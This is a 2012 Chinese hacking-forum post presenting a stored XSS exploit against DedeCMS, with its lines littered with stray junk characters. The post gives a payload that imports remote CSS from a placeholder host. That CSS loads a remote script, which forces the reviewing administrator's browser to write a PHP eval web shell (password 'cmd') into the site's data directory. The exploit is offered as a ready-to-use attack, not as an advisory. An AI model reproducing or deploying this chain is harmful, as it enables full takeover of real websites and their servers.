找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1734|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
3 i4 I8 V4 _1 o: D6 k' L为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
8 G7 n* m2 f6 H目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。! }  o1 \0 E  n1 }7 H8 I
下面说说利用方法。  p' ]. \! d( e9 r2 E4 M
条件有2个:* \4 C! k5 U4 R. k; R( e5 V
1.开启注册/ w  H+ e7 y8 h+ i' @: y% v! R: }
2.开启投稿) t  x" {# _1 \7 m: Q+ O
注册会员----发表文章
6 o5 H; J$ M) a( B$ T# z' l: s内容填写:
/ t9 g8 V8 `7 \0 Y+ u* S复制代码6 O/ a6 c6 h, [/ p! b
<style>@im\port'\http://xxx.com/xss.css';</style>
& {$ n" ?5 Y; {$ T' u新建XSS.Css
4 k5 y9 B+ p1 Y9 W% e' a3 q: J: H- d3 @复制代码
5 c+ r% `, v. u.body{
7 n5 G2 |( e& U2 m1 Fbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }. ]2 |0 K, }  z( n' b3 i
新建xss.js 内容为( x0 S! B; D  M6 i
复制代码! O' E" J& v9 c
1.var request = false;1 Z. k3 B, n) }' [0 X7 U+ S3 `
2.if(window.XMLHttpRequest) {9 w9 o8 e/ c* b( O( M
3.request = new XMLHttpRequest();2 }( O3 G, j$ @
4.if(request.overrideMimeType) {
! E+ z, X4 L  H& W4 b/ E# a5.request.overrideMimeType('text/xml');/ H, o0 r+ C! c* _
6.}3 b5 o! f9 B$ ]3 R! X5 ^
7.} else if(window.ActiveXObject) {* l# d/ |# y0 Z) u( L
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
% M5 Z: U4 ^9 R7 D9.for(var i=0; i<versions.length; i++) {- y9 H# D% G% M5 e& l" l+ Q
10.try {
$ W8 I) ?1 C$ G11.request = new ActiveXObject(versions);; j( x% }6 N( {5 B" G+ ^
12.} catch(e) {}
! A# r. Q, M9 n6 u# y1 C+ K13.}/ [9 t' \' f4 c# ^3 H* i, i
14.}1 j; S- b, P! O$ @1 C1 P5 z
15.xmlhttp=request;
& s$ o# a, V  b4 A7 e9 I" x$ X* Y16.function getFolder( url ){. }4 Z3 W: j; Z/ p4 R$ }; k, ~
17. obj = url.split('/')
& s- R+ W8 _$ n, T! d18. return obj[obj.length-2]
, \4 t& E0 k$ ~. B' O4 `$ w  q19.}
- J/ Y' V: \, o# `" F! Q20.oUrl = top.location.href;5 K% C: h  c  A! d
21.u = getFolder(oUrl);
4 ^* |! F3 M. W  a9 W( s6 c  W$ n: }22.add_admin();
( z7 [2 w4 J* t. B23.function add_admin(){- l1 W* F+ S: h2 p; U* ]( R
24.var url= "/"+u+"/sys_sql_query.php";" a' u. r3 r2 y; V! ^
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";0 i6 Q  p6 o; K, L% ~/ M# \
26.xmlhttp.open("POST", url, true);. t% f* f$ j# [* P( Q3 S
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");8 o7 Q2 B( `1 D9 T" l* q
28.xmlhttp.setRequestHeader("Content-length", params.length);
% [" C; W1 x7 U29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");+ Q. H" Y: Q. M+ x5 B
30.xmlhttp.send(params);
2 `4 A' v- a+ Z$ [' q8 a31.}
$ m# z" Q1 f% X; q) o9 E2 T  C  {0 Y当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表